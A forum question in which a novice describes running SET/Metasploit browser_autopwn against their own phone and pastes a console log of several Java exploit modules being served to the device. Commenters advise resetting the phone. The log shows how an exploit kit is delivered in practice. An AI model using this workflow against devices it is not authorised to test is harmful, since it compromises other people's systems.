# SET tool autopwn website type penetration

Tags: penetration-test, exploit, metasploit, social-engineering, kali-linux

I tried to hack my second computer and phone in my local network.
I am not very experienced so instead of picking the particular options and payloads i just pressed autopwn to use them all instantly.
What i actually get now is in the code below, but i am not sure if i achieved anything? 
I configurated IPs, cloned website etc and this what i see now:
And by the way, when i closed it all i saw the message "exiting and cleaning all exploits" does that mean the phone is clean anyway? or should i give it a factory reset to feel safe now?

```
[*] Starting the payload handler...

[*] --- Done, found 21 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.100:8080/
[*] Server started.
[*] 192.168.1.102    browser_autopwn - Handling '/'
[*] 192.168.1.102    browser_autopwn - Handling '/?sessid=QW5kcm9pZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6ZW4tVVM6YXJtbGU6Q2hyb21lOjM5LjAuMjE3MS45Mzo%3d'
[*] 192.168.1.102    browser_autopwn - JavaScript Report: Android:undefined:undefined:undefined:undefined:en-US:armle:Chrome:39.0.2171.93:
[*] 192.168.1.102    browser_autopwn - Responding with 7 exploits
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102    java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.102    java_verifier_field_access - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.102    java_verifier_field_access - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102    java_jre17_provider_skeleton - handling request for /DkeFLS
[*] 192.168.1.102    java_jre17_provider_skeleton - handling request for /DkeFLS/

msf auxiliary(browser_autopwn) >
```

Comment: So, you tried to hack yourself, you don't know if you were successful, and you don't know if you're still compromised?

Comment: Exactly xD I have been reading some articles for a week now but what people do usually looks differently than this.
Mostly i got here some "acces denied" etc. But as you can see somewhere you can see lets say "generated jar to drop" or "handling request" this sounds promissing to me.
Everyone has to start somewhere but i cant get through this :D

Comment: Usually, you define the success criteria before you start :). At this point, you are in the midst of the unknown, so reset the device.

Comment: @schroeder That's actually some good advice. I will check each one and this should give me some view on this :D